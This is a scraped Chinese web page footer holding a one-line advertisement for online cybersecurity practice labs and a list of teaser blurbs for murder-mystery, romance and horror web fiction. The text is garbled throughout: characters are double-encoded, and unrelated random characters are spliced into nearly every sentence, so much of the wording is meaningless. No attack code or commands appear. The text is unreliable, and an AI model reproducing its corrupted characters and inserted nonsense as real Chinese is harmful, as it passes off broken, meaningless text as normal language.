真實環(huán)境,在線實操學(xué)網(wǎng)絡(luò)安全 淘菩; 實驗內(nèi)容涵蓋:系統(tǒng)安全遵班,軟件安全,網(wǎng)絡(luò)安全潮改,Web安全狭郑,移動安全,CTF汇在,取證分析翰萨,滲透測試,網(wǎng)安意識教育等糕殉。

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 人面猴
    序言:七十年代末亩鬼,一起剝皮案震驚了整個濱河市殖告,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌雳锋,老刑警劉巖丛肮,帶你破解...
    沈念sama閱讀 216,372評論 6 498
  • 死咒
    序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異魄缚,居然都是意外死亡,警方通過查閱死者的電腦和手機焚廊,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,368評論 3 392
  • 救了他兩次的神仙讓他今天三更去死
    文/潘曉璐 我一進店門冶匹,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人咆瘟,你說我怎么就攤上這事嚼隘。” “怎么了袒餐?”我有些...
    開封第一講書人閱讀 162,415評論 0 353
  • 道士緝兇錄:失蹤的賣姜人
    文/不壞的土叔 我叫張陵飞蛹,是天一觀的道長。 經(jīng)常有香客問我灸眼,道長卧檐,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 58,157評論 1 292
  • ?港島之戀(遺憾婚禮)
    正文 為了忘掉前任焰宣,我火速辦了婚禮霉囚,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘匕积。我一直安慰自己盈罐,他們只是感情好,可當(dāng)我...
    茶點故事閱讀 67,171評論 6 388
  • 惡毒庶女頂嫁案:這布局不是一般人想出來的
    文/花漫 我一把揭開白布闪唆。 她就那樣靜靜地躺著盅粪,像睡著了一般。 火紅的嫁衣襯著肌膚如雪悄蕾。 梳的紋絲不亂的頭發(fā)上票顾,一...
    開封第一講書人閱讀 51,125評論 1 297
  • 城市分裂傳說
    那天,我揣著相機與錄音帆调,去河邊找鬼库物。 笑死,一個胖子當(dāng)著我的面吹牛贷帮,可吹牛的內(nèi)容都是我干的戚揭。 我是一名探鬼主播,決...
    沈念sama閱讀 40,028評論 3 417
  • 雙鴛鴦連環(huán)套:你想象不到人心有多黑
    文/蒼蘭香墨 我猛地睜開眼撵枢,長吁一口氣:“原來是場噩夢啊……” “哼民晒!你這毒婦竟也來了精居?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 38,887評論 0 274
  • 萬榮殺人案實錄
    序言:老撾萬榮一對情侶失蹤潜必,失蹤者是張志新(化名)和其女友劉穎靴姿,沒想到半個月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體磁滚,經(jīng)...
    沈念sama閱讀 45,310評論 1 310
  • ?護林員之死
    正文 獨居荒郊野嶺守林人離奇死亡佛吓,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,533評論 2 332
  • ?白月光啟示錄
    正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了垂攘。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片维雇。...
    茶點故事閱讀 39,690評論 1 348
  • 活死人
    序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖晒他,靈堂內(nèi)的尸體忽然破棺而出吱型,到底是詐尸還是另有隱情,我是刑警寧澤陨仅,帶...
    沈念sama閱讀 35,411評論 5 343
  • ?日本核電站爆炸內(nèi)幕
    正文 年R本政府宣布津滞,位于F島的核電站,受9級特大地震影響灼伤,放射性物質(zhì)發(fā)生泄漏触徐。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 41,004評論 3 325
  • 男人毒藥:我在死后第九天來索命
    文/蒙蒙 一狐赡、第九天 我趴在偏房一處隱蔽的房頂上張望锌介。 院中可真熱鬧,春花似錦猾警、人聲如沸孔祸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,659評論 0 22
  • 一樁弒父案发皿,背后竟有這般陰謀
    文/蒼蘭香墨 我抬頭看了看天上的太陽崔慧。三九已至,卻和暖如春穴墅,著一層夾襖步出監(jiān)牢的瞬間惶室,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 32,812評論 1 268
  • 情欲美人皮
    我被黑心中介騙來泰國打工玄货, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留皇钞,地道東北人。 一個月前我還...
    沈念sama閱讀 47,693評論 2 368
  • 代替公主和親
    正文 我出身青樓松捉,卻偏偏與公主長得像夹界,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子隘世,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 44,577評論 2 353